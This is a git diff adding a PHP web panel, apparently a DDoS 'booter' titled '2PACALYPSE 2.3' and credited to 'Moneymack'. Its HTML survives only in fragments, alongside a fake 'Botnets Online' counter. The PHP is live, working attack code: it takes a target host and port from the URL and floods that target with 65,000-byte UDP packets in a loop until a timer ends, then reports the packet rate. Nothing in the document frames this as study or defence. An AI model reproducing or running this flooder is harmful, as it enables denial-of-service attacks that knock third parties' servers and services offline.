diff --git a/php/2PACALYPSE 2.3.exe.php b/php/2PACALYPSE 2.3.exe.php new file mode 100644 index 0000000..ba3178b --- /dev/null +++ b/php/2PACALYPSE 2.3.exe.php @@ -0,0 +1,114 @@ + + +2PACALYPSE 2.3 +
+ +
+
+
+
+
C:\Windows\System32\2PACALYPSE 2.3.exe
+
+ + + +
+
+
+

2PACALYPSE 2.3

+

-Coded by Moneymack

+
+
+
+
+ + IP: Port:


+ +
+
+
+

Botnets Online: 22

+
+
+ "; + $max_time = $time + $exec_time; + + $host = $_GET['host']; + $port = $_GET['port']; + + for ($i = 0;$i < 65000;$i++) { + $out .= 'X'; + } + while (1) { + $packets++; + if (time() > $max_time) { + break; + } + $fp = fsockopen('udp://'.$host, $port, $errno, $errstr, 5); + if ($fp) { + fwrite($fp, $out); + fclose($fp); + } + } + echo "
UDP Flood
Completed with $packets (" . round(($packets * 65) / 1024, 2) . " MB) packets averaging ". round($packets / $exec_time, 2) . " packets per second \n"; + } + ?> + + + +
+
+ +